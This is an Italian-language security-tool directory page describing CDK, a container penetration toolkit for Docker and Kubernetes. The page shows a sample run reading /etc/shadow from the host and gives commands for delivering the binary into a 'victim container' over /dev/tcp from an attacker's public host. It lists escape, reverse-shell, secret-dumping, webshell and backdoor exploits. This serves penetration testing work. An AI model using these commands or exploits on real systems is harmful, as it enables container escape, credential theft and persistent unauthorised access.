Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CDK — 📦 Rendi più facile il test di sicurezza di K8s, Docker e Containerd. | Kitploit
Strumenti/GitHubGitHub/cdk-team/cdk
Escalation di PrivilegiRicognizioneSicurezza dei ContenitoriMeccanismi di PersistenzaExploitMovimento LateralePost-ExploitPenetration TestingSicurezza CloudEscape dal Container
GitHubcdk-team/cdk

CDK

4.7k6063 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

📦 Rendi più facile il test di sicurezza di K8s, Docker e Containerd.

Vedi RepositorySito web

CDK - Toolkit di Penetrazione per Container a Zero Dipendenze

Inglese | 简体中文

png

Dichiarazione di non responsabilità legale

L'uso di CDK per attaccare bersagli senza previo consenso reciproco è illegale. CDK è destinato esclusivamente a scopi di test di sicurezza.

Panoramica

CDK è un toolkit di penetrazione per container open-source, progettato per offrire sfruttamento stabile in diversi container snelli senza alcuna dipendenza dal sistema operativo. Viene fornito con utili net-tools e molti potenti PoC/EXP e ti aiuta a fuggire dal container e a prendere il controllo del cluster K8s facilmente.

Avvio rapido

Esegui cdk eva per ottenere informazioni di valutazione e un exploit raccomandato, quindi esegui cdk run per avviare l'attacco.

root@kitploit:~
> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installazione/Consegna

Scarica l'ultima release da https://github.com/cdk-team/CDK/releases/

Inserisci i file eseguibili nel container di destinazione e inizia i test.

SUGGERIMENTI: Consegnare CDK nel container di destinazione in un test di penetrazione reale

Se hai un exploit che può caricare un file, allora puoi caricare direttamente il binario di CDK.

Se hai un exploit RCE, ma il container di destinazione non ha curl o wget, puoi utilizzare il seguente metodo per consegnare CDK:

  1. First, host CDK binary on your host with public IP.
root@kitploit:~
(on your host)
nc -lvp 999 < cdk
  1. Inside the victim container execute
root@kitploit:~
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Utilizzo

root@kitploit:~
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

Caratteristiche

CDK ha tre moduli:

  1. Valutazione: raccogli informazioni all'interno del container per trovare potenziali debolezze.
  2. Exploit: per fuga dal container, persistenza e movimento laterale
  3. Strumenti: net-tools e API per richieste TCP/HTTP, tunnel e gestione del cluster K8s.

Modulo di Valutazione

Utilizzo

root@kitploit:~
cdk evaluate [--full]

Modulo Exploit

Elenca tutti gli exploit disponibili:

root@kitploit:~
cdk run --list

Esegui exploit mirato:

root@kitploit:~
cdk run <script-name> [options]

Nota su Thin: La thin release è preparata per shell di container a vita breve come funzioni serverless. Aggiungiamo tag di build nel codice sorgente e tagliamo alcuni exploit per rendere il binario più leggero. Il file da 2 MB contiene il 90% delle funzioni di CDK, inoltre puoi selezionare exploit utili dal codice sorgente di CDK per creare il tuo binario leggero personalizzato.

Modulo Strumenti

Esecuzione di comandi come in Linux, leggermente diversa negli argomenti di input, vedi il link di utilizzo.

root@kitploit:~
cdk nc [options]
cdk ps

Documentazione della Release

Se vuoi sapere come abbiamo rilasciato una nuova versione, come viene prodotta la thin, perché forniamo versioni upx, quali sono le differenze tra le diverse versioni (all, normal, thin, upx) e come scegliere exploit e strumenti CDK specifici per compilare una release personalizzata, consulta il Documento di Rilascio.

Documentazione per Sviluppatori

  • esegui test nel container.

Contribuire a CDK

Innanzitutto, grazie per aver dedicato del tempo a contribuire!

Grazie ai seguenti contributori:

Altri contributori: Elenco Contributori

Segnalazione di Bug

I bug vengono tracciati come GitHub Issues. Crea un issue con la versione corrente di CDK, il messaggio di errore e l'ambiente. Descrivi i passaggi esatti che riproducono il problema.

Suggerire Miglioramenti

I suggerimenti di miglioramento vengono tracciati come GitHub Discussions. Puoi pubblicare qualsiasi pensiero qui per discutere direttamente con gli sviluppatori.

Pull Requests

Risolvere problemi o mantenere la qualità di CDK:

  • Descrivi la versione corrente di CDK, l'ambiente, il problema e i passaggi esatti che riproducono il problema.
  • Screenshot o log in esecuzione prima e dopo aver risolto il problema.

Nuova funzionalità o exploit:

  • Spiega perché questo miglioramento sarebbe utile ad altri utenti.
  • Si prega di consentire un ambiente sostenibile per la revisione dei contributi.
  • Screenshot su come funziona questa nuova funzionalità.
  • Se stai effettuando il commit di nuovi script di valutazione/exploit, aggiungi una semplice documentazione al tuo messaggio PR, ecco un esempio.

Eventi

404StarLink 2.0 - Galaxy

png

Il progetto CDK è ora incluso in 404Team Starlink Project 2.0. Unisciti alla comunità StarLink per entrare in contatto con il team di sviluppo di CDK.

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • Briefing: "Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Anche uno strumento fantastico per Bug Bounty per piattaforma Cloud

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
Scarica lo strumento
TatticheScriptSupportatoUtilizzo/Esempio
Raccolta InformazioniInformazioni Base del SO✔link
Raccolta InformazioniCapacità Disponibili✔link
Raccolta InformazioniComandi Linux Disponibili✔link
Raccolta InformazioniMount✔link
Raccolta InformazioniNamespace di Rete✔link
Raccolta InformazioniENV Sensibili✔link
Raccolta InformazioniProcessi Sensibili✔link
Raccolta InformazioniFile Locali Sensibili✔link
Raccolta InformazioniKube-proxy Route Localnet (CVE-2020-8558)✔link
Raccolta InformazioniScoperta Servizi Basata su DNS✔link
ScopertaInformazioni API Server K8s✔link
ScopertaInformazioni Service Account K8s✔link
ScopertaAPI Metadata del Provider Cloud✔link
TatticaTecnicaNome Exploit CDKSupportatoIn ThinDocumentazione
Fugadocker-runc CVE-2019-5736runc-pwn✔✔
Fugacontainerd-shim CVE-2020-15257shim-pwn✔link
Fugadocker.sock PoC (attacco DIND)docker-sock-check✔✔link
Fugadocker.sock RCEdocker-sock-pwn✔✔link
FugaDocker API (2375) RCEdocker-api-pwn✔✔link
FugaFuga tramite Mount Dispositivomount-disk✔✔link
FugaFuga LXCFSlxcfs-rw✔✔link
FugaFuga Cgroupsmount-cgroup✔✔link
FugaAbuso di User Namespace non privilegiato CVE-2022-0492abuse-unpriv-userns✔✔link
FugaFuga Procfsmount-procfs✔✔link
FugaPtrace Escaping PoCcheck-ptrace✔✔link
FugaRiscrittura Cgroup (devices.allow)rewrite-cgroup-devices✔✔link
FugaLettura file arbitrario dal sistema host (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔link
ScopertaProbe Componenti K8sservice-probe✔✔link
ScopertaDump Istio Sidecar Metaistio-check✔✔link
ScopertaDump delle Policy di Sicurezza dei Pod K8sk8s-psp-dump✔link
Controllo RemotoReverse Shellreverse-shell✔✔link
Controllo RemotoKubelet Execkubelet-exec✔✔
Accesso alle CredenzialiRegistry BruteForceregistry-brute✔✔link
Accesso alle CredenzialiScansione Chiavi di Accessoak-leakage✔✔link
Accesso alle CredenzialiEtcd Ottieni Token K8setcd-get-k8s-token✔✔
Accesso alle CredenzialiDump dei Segreti K8sk8s-secret-dump✔✔link
Accesso alle CredenzialiDump della Configurazione K8sk8s-configmap-dump✔✔link
Escalation dei PrivilegiBypass RBAC K8sk8s-get-sa-token✔✔link
Escalation dei PrivilegiCVE-2026-31431 copy-fail (solo non-root→root e x86_64)copy-fail-cve-2026-31431✔link
PersistenzaDistribuzione WebShellwebshell-deploy✔✔link
PersistenzaDistribuzione Pod Backdoork8s-backdoor-daemonset✔✔link
PersistenzaDistribuzione API Server K8s Ombrak8s-shadow-apiserver✔link
PersistenzaAttacco MITM K8s (CVE-2020-8554)k8s-mitm-clusterip✔✔link
PersistenzaDistribuzione CronJob K8sk8s-cronjob✔✔link
ComandoDescrizioneSupportatoUtilizzo/Esempio
ncTunnel TCP✔link
psInformazioni sui Processi✔link
netstatSimile al comando "netstat -antup"✔
ifconfigInformazioni di Rete✔link
viModifica File✔link
ectlEnumerazione non autorizzata di chiavi etcd✔
kcurlRichiesta all'API Server K8s✔link
dcurlRichiesta all'API HTTP di Docker✔link
ucurlRichiesta al Socket Unix di Docker✔link
rcurlRichiesta all'API del Registry Docker
probeScansione IP/Porte✔link